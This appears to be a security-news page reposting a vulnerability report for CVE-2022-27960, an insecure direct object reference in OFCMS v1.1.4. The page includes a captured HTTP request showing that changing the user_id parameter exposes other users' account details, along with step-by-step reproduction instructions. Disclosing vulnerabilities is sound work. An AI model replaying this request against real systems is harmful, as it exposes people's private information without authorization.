Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-27960: There is a Information disclosure vulnerability exists in ofcms · Issue #I4Z8SS · 欧福/ofcms - Gitee.com

Insecure permissions configured in the user_id parameter at SysUserController.java of OFCMS v1.1.4 allows attackers to access and arbitrarily modify users’ personal information.

CVE
#vulnerability#web#windows#apple#js#git#java

[Suggested description]
Information leakage vulnerability exists in the ofCMS background. As the detail method in SysUserController does not securely limit the user_id parameter passed, any background user can view the personal information of other users by modifying the value of user_id.

输入图片说明

[Vulnerability Type]
Information disclosure

[Vendor of Product]
https://gitee.com/oufu/ofcms

[Affected Product Code Base]
v1.1.4

[Affected Component]

POST /ofcms/admin/system/user/detail.json HTTP/1.1
Host: localhost:7000
Content-Length: 54
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:7000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:7000/ofcms/admin/f.html?p=system/user/edit.html&topMode=readonly&user_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B07DD54FA7B0F4A0B6F042CBEFD725E0
Connection: close

p=system%2Fuser%2Fedit.html&topMode=readonly&user_id=1

[Attack Type]
Remote

[Vulnerability to prove]
1.Enter the system background, open the Burpsuite agent function, click “Basic Information”
输入图片说明

2.To obtain captured packet data,change the value of user_id to 1.
输入图片说明

3.Click send data package, popup user basic information window, but the current user’s input has not been transmitted.
输入图片说明

4.To obtain captured packet data, change the value of user_id to 1.
输入图片说明

5.The administrator successfully obtains the account information after sending the data packet.
输入图片说明

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907